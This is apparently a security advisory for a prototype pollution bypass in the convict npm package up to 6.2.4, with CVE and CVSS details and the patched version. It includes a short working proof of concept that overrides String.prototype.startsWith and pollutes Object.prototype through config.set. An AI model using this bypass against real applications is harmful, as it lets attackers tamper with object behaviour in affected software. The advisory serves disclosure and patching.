A prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype.
The vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where startsWith() function is used to check whether user provided input contain forbidden strings.
npm install or cloning from gitString.prototype.startsWith = () => false;
const convict = require('convict');
let obj = {};
const config = convict(obj);
console.log({}.polluted);
config.set('constructor.prototype.polluted', 'yes');
console.log({}.polluted); // prints yes -> the patch is bypassed and prototype pollution occurred
Prototype pollution should be prevented and {} should not gain new properties.
This should be printed on the console:
undefined
undefined OR throw an Error
Object.prototype is polluted
This is printed on the console:
undefined
yes
This is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using convict.set may be affected.
It could potentially lead to the following problems:
No EPSS score in this advisory JSON.
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 9.4 | 4.0 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-44fc-8fm5-q62h ↗ |
| CVE | CVE-2026-33864 ↗ |
| CWE id | Name |
|---|---|
| CWE-1321 | Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| npm | convict | <= 6.2.4 | 6.2.5 | — |